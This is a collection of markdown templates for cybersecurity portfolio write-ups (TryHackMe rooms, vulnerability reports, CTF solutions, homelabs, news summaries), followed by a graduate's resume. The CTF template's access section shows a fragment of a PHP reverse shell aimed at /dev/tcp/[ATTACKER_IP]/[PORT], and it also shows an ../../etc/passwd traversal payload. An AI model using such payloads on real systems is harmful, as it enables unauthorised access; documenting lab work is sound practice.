# Templates # Advent of Cyber ### Overview --- **Room URL:** **Difficulty:** **Category:** **Date Completed:** ### Objective objective --- ### Table of Contents [Introduction](#bkmrk-introduction) [Walk Through](#bkmrk-walk-through) [Lessons Learned](#bkmrk-lessons-learned) [Resources](#bkmrk-resources) --- ### Introduction This is an introduction to the room. --- ### Walk Through This is the walkthrough section --- ### Lessons Learned - --- ### Resources [TryHackMe](tryhackme.com) # Vulnerability Write Up **Date:** [YYYY-MM-DD] **Category:** [Penetration Testing / Web Application Security / Network Defense / Threat Analysis / etc.] **Tools Used:** [Nmap, Metasploit, Wireshark, Burp Suite, Python, etc.] **Target/Scope:** [Specify target system, application, or network segment] --- ## 💡 Executive Summary A brief, non-technical summary of the project's goal, the most significant findings, and the overall outcome. * **Goal:** [Briefly state the objective, e.g., "Identify critical vulnerabilities in the X application's login mechanism."] * **Key Finding:** [Highlight the most important discovery, e.g., "Discovered a high-severity SQL Injection."] * **Outcome:** [Briefly state the result, e.g., "The vulnerability was successfully exploited, and a remediation strategy was developed."] --- ## 🔬 Methodology and Execution Detail the steps taken, including reconnaissance, scanning, and exploitation phases. ### Phase 1: Reconnaissance * **Initial Discovery:** [Briefly describe how the target was identified/accessed.] * **Enumeration:** Used `[Tool Name]` to find: * Open Ports: [List ports] * Technologies: [List technologies, e.g., Apache 2.4.6, PHP 7.2] * [Other Key Information] ### Phase 2: Vulnerability Analysis * **Vulnerability Name:** [Specific name, e.g., Cross-Site Scripting (XSS)] * **Description:** [Explain what the vulnerability is and why it exists.] * **CVE/CWE Reference (if applicable):** [e.g., CVE-2023-XXXXX or CWE-79] ### Phase 3: Proof of Concept (PoC) Provide the exact steps and evidence (screenshots, code blocks) showing the exploitation. 1. **Step 1:** [Action taken] 2. **Step 2:** [Action taken, e.g., "Injected the payload: `[Payload]`"] 3. **Result:** [Describe the outcome, e.g., "The browser successfully executed the script."] > **Code Block Example (Payload):** > ```html > > ``` --- ## ✅ Remediation and Mitigation What steps were recommended or taken to fix the issue? * **Recommendation:** [Specific fix, e.g., "Implement proper input sanitization and use parameterized queries."] * **Defense:** [General defense principle, e.g., "Follow the principle of least privilege for the database user."] * **Impact:** [What was the business/security risk?] --- ## 🧠 Lessons Learned What did you learn from this project? * [Key technical skill refined] * [Insight into defensive/offensive strategies] * [Unexpected challenges encountered and overcome] # Certification or Course Summary **Completion Date:** [YYYY-MM-DD] **Issuing Body:** [CompTIA, Offensive Security, SANS, etc.] **Domain Focus:** [Network Security, Incident Response, Ethical Hacking, Cloud Security, etc.] **Portfolio Value:** [High/Medium - Why is this relevant?] --- ## 🎯 Key Objectives * [Objective 1: Summarize a major area covered] * [Objective 2: Summarize another major area covered] * [Objective 3: Summarize a major area covered] --- ## 🛠️ Core Skills Gained/Refined ### Network Security * **Firewall Management:** Gained proficiency in configuring ACLs and NAT on [Cisco/Juniper/etc.] devices. * **Protocol Analysis:** Deep dive into TCP/IP, understanding packet structure using **Wireshark**. ### Security Operations (SecOps) * **SIEM Usage:** Experience in parsing logs and creating detection rules in **Splunk/ELK Stack**. * **Incident Handling:** Applied the [NIST/SANS] Incident Response lifecycle to simulated scenarios. --- ## 📚 Significant Project or Lab Briefly describe the most challenging or informative project/lab undertaken during the course. * **Title:** [e.g., "Building an Active Directory Lab for Lateral Movement Simulation"] * **Summary:** [2-3 sentences explaining the project and its outcome.] --- ## 🚀 Next Steps How will you apply this knowledge? * [Specific goal, e.g., "Apply these concepts to a real-world bug bounty target."] * [Related certification or learning path] # News/Research Summary ## 🚨 Analyzing the [Specific Event/CVE Title] **Date Published:** [YYYY-MM-DD] **Topic:** [Supply Chain Attack / Critical Vulnerability / Ransomware Trend] **CVSS Score (if applicable):** [e.g., 9.8 (Critical)] --- ## 🌍 What Happened? A concise, accessible explanation of the event or vulnerability. > **Quote/Key Fact:** "This vulnerability affects all unpatched versions of the [Software Name] from [Version] onwards, allowing for unauthenticated Remote Code Execution (RCE)." --- ## 💥 Technical Details and Impact * **Affected Parties:** [List types of organizations or systems affected.] * **Mechanism:** [Explain the technical root cause in simple terms. E.g., "A lack of proper bounds checking in the input buffer."] * **Threat Actor (if known):** [e.g., Nation-state / Financially-motivated group] --- ## 🛠️ My Analysis and Mitigation Strategy What does this mean for a security professional, and how should one respond? 1. **Immediate Action:** Patching is critical. Prioritize systems that are [Public-facing / Contain sensitive data]. 2. **Detection:** Implement **IDS/IPS** signatures to watch for the exploit payload. 3. **Proactive Defense:** Review the **Software Bill of Materials (SBOM)** to identify exposure to the vulnerable library. --- ## 🔮 Looking Forward What is the long-term lesson? * [Focus on better secure coding practices, stronger vendor scrutiny, etc.] # CTF Writeup **Event/Platform:** [Hack The Box / TryHackMe / PicoCTF / Local Event] **Date Solved:** [YYYY-MM-DD] **Category:** [Web / Reverse Engineering / Pwn / Crypto / Forensics / Misc] **Difficulty:** [Easy / Medium / Hard / Insane] --- ## 🔍 Initial Discovery and Reconnaissance How did you first approach the problem? * **Target:** [IP Address / URL / File Name] * **Initial Step:** [e.g., "Ran Nmap scan on all ports."] * **Key Finding:** [The one piece of information that pointed you in the right direction, e.g., "Discovered a hidden `.git` directory."] > **Code Block Example (Nmap Output):** > ```bash > # nmap -sC -sV [IP] > PORT STATE SERVICE VERSION > 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) > 22/tcp open ssh OpenSSH 8.2p1 Ubuntu > ``` --- ## 🧩 Exploitation Path and Steps Detail the logical sequence of steps that led to the flag. Break this down into smaller, digestible phases. ### Phase 1: Finding the Vulnerability (e.g., Web App) * **Tool Used:** [Burp Suite / Dirb / Nikto] * **Action:** [e.g., "Fuzzing a parameter in the contact form."] * **Vulnerability Type:** [e.g., Local File Inclusion (LFI)] * **Proof:** [e.g., "The application returned the contents of `/etc/passwd` when the payload `../../etc/passwd` was injected."] ### Phase 2: Gaining Access/Shell * **Technique:** [e.g., "Used the LFI to access the log files and inject a PHP reverse shell."] * **Payload/Command:** ```php & /dev/tcp/[ATTACKER_IP]/[PORT] 0>&1'"); ?> ``` * **Result:** [e.g., "Successfully obtained a low-privilege shell as user `www-data`."] ### Phase 3: Privilege Escalation (if necessary) * **Method:** [e.g., Misconfigured SUID binary] * **Tool:** [e.g., LinPEAS, manually checked `sudo -l`] * **Final Action:** [Command used to escalate, e.g., `sudo /usr/bin/python3 /tmp/exploit.py`] --- ## 🏆 The Flag Document the final steps and the flag itself. * **Location:** [The file path or database table where the flag was found.] * **Flag Value:** (Optional, often replace with `[FLAG REDACTED]`) ``` FLAG{[REDACTED_EXAMPLE_FLAG]} ``` --- ## 🧠 Key Takeaway What specific technical or problem-solving concept did this challenge reinforce? * [e.g., "Reinforced the importance of manual code review, as automated tools missed the vulnerability."] * [e.g., "Learned a new technique for exploiting deserialization flaws in Python."] # HomeLab **Date:** [YYYY-MM-DD] **Objective:** [e.g., Design, build, and secure a virtual environment for malware analysis.] **Components:** [List major systems, e.g., pfSense Firewall, Kali VM, Windows Server 2022 AD, Splunk SIEM] --- ## 🗺️ Architectural Design Provide a high-level overview (a diagram is best here, mentioned as an image). ### Network Topology * **VLAN 10 (Management):** [Description of access and purpose] * **VLAN 20 (Target/DMZ):** [Where vulnerable targets or public services reside] * **VLAN 30 (Analysis/SIEM):** [Where monitoring tools are isolated] [Image of the network diagram/topology] --- ## 🛠️ Security Control Implementation Detail the specific defensive tools and configurations you implemented. ### 🛡️ Perimeter Defense (pfSense/Firewall) | Control | Mechanism | Configuration Detail | | :--- | :--- | :--- | | **IDS/IPS** | **Snort/Suricata** | Configured ruleset for C2 and known exploit detection. | | **Egress Filtering** | **Firewall Rules** | Blocking outbound traffic on non-standard ports (e.g., 25, 139, 445). | | **VPN Access** | **OpenVPN** | Enforced 2FA and strong cryptography ($AES-256-GCM$). | ### 📊 Monitoring & Logging (SIEM) * **SIEM Used:** [Splunk / ELK Stack / Security Onion] * **Data Sources:** Ingested logs from: * Active Directory (Security Event Logs) * pfSense (Firewall logs) * Endpoint Protection ([e.g., Sysmon on Windows]) * **Detection Rules Created:** [e.g., "Alert on 10+ failed login attempts within 60 seconds."] --- ## 📈 Testing and Validation How did you ensure the defenses were working? * **Testing Method:** [e.g., Ran a controlled **Metasploit** attack from the Kali VM to the Target VM.] * **Validation:** [e.g., "Confirmed that the Snort IDS successfully blocked the initial exploit attempt and logged the traffic."] * **Post-Mortem:** [e.g., "Found a bypass path, requiring a rule change in the firewall."] --- ## 📚 Technical Learnings * [Specific command or configuration learned, e.g., "Mastered the use of `rsyslog` for centralized logging."] * [Insight into enterprise-level challenges, e.g., "The difficulty of correctly tuning SIEM rules to avoid false positives."] # THM Template ### Overview --- **Room URL:** [Room URL] **Difficulty:** [Easy/Medium/Hard] **Category:** [Category] **Date Completed:** [Date] ### Objective [Brief description of what the room teaches and the main goals] --- ### Table of Contents [Introduction](#bkmrk-introduction) [Walk Through](#bkmrk-walk-through) [Lessons Learned](#bkmrk-lessons-learned) [Resources](#bkmrk-resources) --- ### Introduction #### [Main Concept/Topic] [Brief overview of what this topic is about] #### Why This Matters [Explain the real-world relevance and importance of this technique/concept] --- #### Method/Technique 1: [Name] **What is it?** [Explanation of the concept] **Purpose:** [Why this technique is used] **Tool/Method:** [Specific tools or approaches used] **How it Works:** [Step-by-step explanation of the methodology] --- #### Method/Technique 2: [Name] **What is it?** [Explanation of the concept] **Why [Relevant Question]?** [Explanation] **Common Tools:** - [Tool 1] - [Description] - [Tool 2] - [Description] - [Tool 3] - [Description] **How it Works:** [Step-by-step explanation of the methodology] --- #### Method/Technique 3: [Name] **What is it?** [Explanation of the concept] **Tools:** [Description of tools and their capabilities] --- #### Method/Technique 4: [Name] **The Concept:** [Explanation of core concept] **Where/How [Relevant Detail]:** - [Point 1] - [Point 2] - [Point 3] **The Attack Method:** [Explanation of how to exploit/use this] **Tool: [Tool Name]** [Brief description of the tool] **Basic Syntax:** ```bash [command syntax] ``` **Key Flags/Options:** - `[flag]`: [Description] - `[flag]`: [Description] - `[flag]`: [Description] **Important Considerations:** [Any caveats, filtering needs, or special notes] --- ### Walk Through #### Task 1: [Task Name] [Step-by-step instructions] 1. [Step 1] 2. [Step 2] 3. [Step 3] **Answer:** `[answer]` --- #### Task 2: [Task Name] [Step-by-step instructions] 1. [Step 1] 2. [Step 2] 3. [Step 3] **Answer:** `[answer]` --- #### Task 3: [Task Name] [Step-by-step instructions] 1. [Step 1] 2. [Step 2] 3. [Step 3] **Answer:** `[answer]` --- #### Task 4: [Task Name] **Step 1: [Sub-step Name]** ```bash [command] ``` - [Explanation point 1] - [Explanation point 2] **Step 2: [Sub-step Name]** ```bash [command] ``` - [Explanation point 1] - [Explanation point 2] - [Explanation point 3] **Answers:** [Question 1]: `[answer]` [Question 2]: `[answer]` --- ### Lessons Learned - [Key takeaway 1] - [Key takeaway 2] - [Key takeaway 3] - [Key takeaway 4] - [Key takeaway 5] - [Key takeaway 6] - [Key takeaway 7] - [Key takeaway 8] --- ### Resources [TryHackMe](https://tryhackme.com) [Resource 1 - Description](URL) [Resource 2 - Description](URL) [Resource 3 - Description](URL) [Resource 4 - Description](URL) [Resource 5 - Description](URL) [Resource 6 - Description](URL) # Resume # David Rizzo **Cybersecurity Graduate • IT & Digital Forensics** --- ## Contact - **Location:** Charlotte, North Carolina 28269 - **LinkedIn:** [linkedin.com/in/davidjrizzo1](https://linkedin.com/in/davidjrizzo1) - **Portfolio:** [portfolio.rizzoit.com](https://portfolio.rizzoit.com) --- ## Summary IT and cybersecurity professional with a strong foundation in technical support, system operations, and security principles. Experienced in troubleshooting, incident analysis, and maintaining reliable computing environments across Windows, Linux, and cloud platforms. Known for combining technical problem-solving with leadership, customer service, and clear communication in fast-paced environments. --- ## Skills ### IT & Systems Technical Support, Troubleshooting, System Monitoring, Windows & Linux Administration ### Security Security Operations, Vulnerability Assessment, IAM, Cryptography, Log Analysis ### Tools Wireshark, Splunk, Burp Suite, Magnet AXIOM, FTK Imager, Docker ### Platforms Windows, Linux (Kali, Ubuntu, Red Hat), macOS, AWS, Azure --- ## Education ### Bachelor of Science in Cybersecurity **Wilmington University** — New Castle, DE *Concentration: Digital Forensics* ### Certificate in Cybersecurity & FinTech **Wilmington University** ### Cybersecurity Certificate (24-Week Program) **University of North Carolina at Charlotte** --- ## Experience ### Customer Service & Team Leadership **Lowe's** — Concord, NC | 2020–2025 - Supported daily operations in high-volume environments while resolving customer and operational issues - Led, coached, and supported teams of up to 30 associates - Recognized for reliability, leadership, and customer satisfaction under pressure ### Videographer / Media Support **Mecklenburg Community Church** — Charlotte, NC | 2019–2020 - Produced and edited weekly video content using Adobe Premiere Pro and After Effects - Managed deadlines, collaborated with teams, and supported live-service operations --- ## Selected Technical Projects ### Digital Forensics Investigation Evidence acquisition, artifact analysis, and formal reporting ### Red Team / Blue Team Lab Simulated attacks and defensive monitoring using Kali & ELK ### Azure ELK Stack Centralized logging, dashboards, and incident response